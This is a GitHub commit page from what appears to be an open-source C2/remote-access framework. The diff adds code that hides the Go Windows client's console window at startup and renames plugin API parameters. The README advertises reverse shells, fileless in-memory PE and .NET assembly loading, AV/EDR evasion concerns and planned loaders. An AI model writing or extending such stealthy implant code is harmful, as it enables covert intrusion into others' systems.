Skip to content

Commit 4dbb257

Browse files
author
greentm372@gmail.com
committed
makeW
1 parent 3cad10c commit 4dbb257

File tree

7 files changed

+77
-39
lines changed

7 files changed

+77
-39
lines changed

ClientGo/Windows/WinMain.exe

6.5 KB
Binary file not shown.

ClientGo/Windows/go.mod

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -8,6 +8,7 @@ require (
88
github.com/Ne0nd0g/go-clr v1.0.3 // indirect
99
github.com/andreburgaud/crypt2go v1.4.1 // indirect
1010
github.com/go-ole/go-ole v1.2.6 // indirect
11+
github.com/gonutz/ide v0.0.0-20200517034207-df64a3832118 // indirect
1112
github.com/google/uuid v1.2.0 // indirect
1213
github.com/rawk77/goAssembly v0.0.0-20220812015350-2855b85a2fba // indirect
1314
github.com/shirou/gopsutil v3.21.11+incompatible // indirect

ClientGo/Windows/go.sum

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,8 @@ github.com/andreburgaud/crypt2go v1.4.1 h1:qiVttvdoXLutIP9cvgOIWR4DWf8qFulToVPU4
99
github.com/andreburgaud/crypt2go v1.4.1/go.mod h1:/63zApooScgRnoJxCK/17N0IdpiilSAHaZYMDRsh6Mc=
1010
github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY=
1111
github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0=
12+
github.com/gonutz/ide v0.0.0-20200517034207-df64a3832118 h1:UDRbotTOMtkuf7TTJQPiSVjdRZqUmi1oGe5fUs2hLww=
13+
github.com/gonutz/ide v0.0.0-20200517034207-df64a3832118/go.mod h1:x+4ZwoglBL1JMgoEUVV5zw/lfCQmcwrhZqox7FuSgSk=
1214
github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs=
1315
github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
1416
github.com/rawk77/goAssembly v0.0.0-20220812015350-2855b85a2fba h1:eLxrK8xzsBADNL6Fr1PjJk6Egu8wjVr+ACr4fCZMrEs=

ClientGo/Windows/main.go

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,7 @@ import (
1313
"sync"
1414
"time"
1515

16+
"github.com/gonutz/ide/w32"
1617
"golang.org/x/sys/windows/registry"
1718
)
1819

@@ -176,6 +177,22 @@ func (s *TCPClient) CloseConnection() {
176177

177178
var ClientWorking bool
178179

180+
func ShowConsole() {
181+
ShowConsoleAsync(w32.SW_SHOW)
182+
}
183+
184+
func ShowConsoleAsync(commandShow uintptr) {
185+
console := w32.GetConsoleWindow()
186+
if console != 0 {
187+
_, consoleProcID := w32.GetWindowThreadProcessId(console)
188+
if w32.GetCurrentProcessId() == consoleProcID {
189+
w32.ShowWindowAsync(console, commandShow)
190+
}
191+
}
192+
}
193+
func HideConsole() {
194+
ShowConsoleAsync(w32.SW_HIDE)
195+
}
179196
func main() {
180197

181198
Host := "HostAAAABBBBCCCCDDDD"
@@ -188,6 +205,7 @@ func main() {
188205
// PcInfo.Host = "192.168.31.81"
189206
// PcInfo.Port = "4000"
190207
// PcInfo.ListenerName = "asd"
208+
HideConsole()
191209
PcInfo.IsDotNetFour = checkDotNetFramework40()
192210
ClientWorking = true
193211
socket := TCPClient{}

Plugins.md

Lines changed: 21 additions & 31 deletions
Original file line numberDiff line numberDiff line change
@@ -4,25 +4,15 @@
44

55

66

7-
8-
9-
10-
11-
12-
13-
14-
15-
16-
177
# 一.函数原型
188

199
## AddCommand
2010

2111
```C#
2212
public static void AddCommand(
2313
string lpName,
24-
string FilePath,
25-
string LoadType,
14+
string filePath,
15+
string loadType,
2616
string description,
2717
string usage
2818
)
@@ -32,8 +22,8 @@ public static void AddCommand(
3222

3323
```C#
3424
public void AddMenuItemA(
35-
string MenuName,
36-
string IconPath
25+
string menuName,
26+
string iconPath
3727
)
3828
```
3929

@@ -43,8 +33,8 @@ public static void AddCommand(
4333

4434
```C#
4535
public void AddMenuItemB(
46-
string MenuName,
47-
string IconPath,
36+
string menuName,
37+
string iconPath,
4838
NLua.LuaFunction clickEvent
4939
)
5040
```
@@ -55,8 +45,8 @@ public void AddMenuItemB(
5545

5646
```C#
5747
public void AttackMenuExpand(
58-
string MenuName,
59-
string IconPath,
48+
string menuName,
49+
string iconPath,
6050
NLua.LuaFunction clickEvent
6151
)
6252
```
@@ -175,8 +165,8 @@ public ComboBox AddComBox(
175165

176166
```C#
177167
public static void ExecuteAssembly(
178-
string FilePath,
179-
string Args
168+
string filePath,
169+
string args
180170
)
181171
```
182172

@@ -186,8 +176,8 @@ public static void ExecuteAssembly(
186176

187177
```C#
188178
public static void Inlineassembly(
189-
string FilePath,
190-
string Args
179+
string filePath,
180+
string args
191181
)
192182
```
193183

@@ -196,15 +186,15 @@ public static void ExecuteAssembly(
196186
## GetFileName
197187

198188
```C#
199-
public string GetFileName(string FilePath)
189+
public string GetFileName(string filePath)
200190
```
201191

202192

203193

204194
## MessageboxA
205195

206196
```C#
207-
public void MessageboxA(string Context)
197+
public void MessageboxA(string conText)
208198
```
209199

210200

@@ -213,8 +203,8 @@ public void MessageboxA(string Context)
213203

214204
```C#
215205
public void MenuStripExpand(
216-
string MenuName,
217-
string IconPath,
206+
string menuName,
207+
string iconPath,
218208
NLua.LuaFunction clickEvent //Click Event
219209
)
220210
```
@@ -225,8 +215,8 @@ public void MenuStripExpand(
225215

226216
```C#
227217
public static void Nopowershell(
228-
string Command,
229-
string OutString
218+
string command,
219+
string outString
230220
)
231221
```
232222

@@ -236,7 +226,7 @@ public static void Nopowershell(
236226

237227
```C#
238228
public static void Upload(
239-
string UploadFilePath,
229+
string uploadFilePath,
240230
string filePath
241231
)
242232
```
@@ -247,15 +237,15 @@ public static void Upload(
247237

248238
```C#
249239
public static void PEloader(
250-
string FilePath,
240+
string filePath,
251241
string args
252242
)
253243
```
254244

255245
## Sessionlog
256246

257247
```C#
258-
public void Sessionlog(string Context)
248+
public void Sessionlog(string conText)
259249
```
260250

261251

README.md

Lines changed: 30 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -6,17 +6,23 @@
66

77
- Teamserver无需安装任何依赖,几乎可以兼容全平台系统
88

9-
- 控制端(Controller)支持反弹shell,文件管理、进程管理、网络流量监控、内存加载等基础功能
9+
- 控制端(Controller)支持反弹shell,文件管理、进程管理、网络流量监控、内存加载、自定义UI背景色等功能
1010

11-
- 支持内存注入,即文件不落地执行木马,中转第三方C2/RAT
11+
- 支持内存注入PE文件(windows端的RunPE,Linux端的memfd),即文件不落地执行木马,中转第三方C2/RAT
12+
13+
- 支持内存执行.net 程序集(execute-assembly、inline-assembly)
14+
15+
- 支持Teamserver托管二进制文件、文本、图片(类似SimpleHttpServer)
1216

1317
- 支持团队服务器自定义配置文件,自定义Telegram的chat ID/Token上线通知
1418

1519
- 控制端(Controller)UI轻量级交互界面,内存占用大约是CobaltStrike的60分之一,是Metasploit的10分之一
1620

1721
- 用lua实现插件扩展,可以加载90% 以上的外部工具(包含市面上C#/Powershell/C/C++编写的渗透测试工具)
1822

19-
- 用Golang编译后的客户端体积较大,因此免杀效果较差(Golang的编译器特征已经被许多AV/EDR厂商标黑了)
23+
- 用Golang编译后的客户端体积较大,因此免杀效果较差(Golang的编译器特征已经被部分AV/EDR厂商标黑了)
24+
25+
2026

2127

2228

@@ -78,7 +84,7 @@ demo
7884

7985

8086

81-
## 3.命令列表
87+
## 命令列表
8288

8389

8490

@@ -97,12 +103,28 @@ demo
97103

98104

99105

100-
## 4.计划开发
106+
## 计划进行
107+
108+
- 用C/C++/C#/Rust编写多阶段加载器(Multi-stage loader),体积尽量控制在150kb以内。
109+
110+
- 目前正反向代理和端口转发未开放,未来考虑完善和开发这个功能。
111+
112+
- 正在开发WebSocket/RUDP/SMB协议的Session模式,Beacon模式仅考虑开发HTTP/HTTPS/DNS。
113+
- 考虑开发shellcode(raw)、Powershell、VBscript、Hta、Jscript等载荷。
114+
115+
- 编写lua更多的,集成更多的内网渗透插件。
116+
117+
- 目前Golang的控制台隐藏问题还无法得到很好的方案,如果您知道如何解决请联系我。
118+
119+
120+
121+
## 更新
122+
123+
101124

102-
1.目前正反向代理和端口转发未开放,未来会完善这个功能。
125+
## 免责声明
103126

104-
2.正在开发WebSocket/RUDP/DNS/SMB协议的Session模式,Beacon模式只考虑开发HTTP/HTTPS
127+
本工具仅用于渗透测试交流和研究,强烈不建议您用于任何的实际用途(包括黑灰产交易和割韭菜),
105128

106129

107130

108-
## 5.更新

github.bat

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
set https_proxy=http://127.0.0.1:9999
2+
git init
3+
git add .
4+
git commit -m "makeW"
5+
git push -f

0 commit comments

Comments
 (0)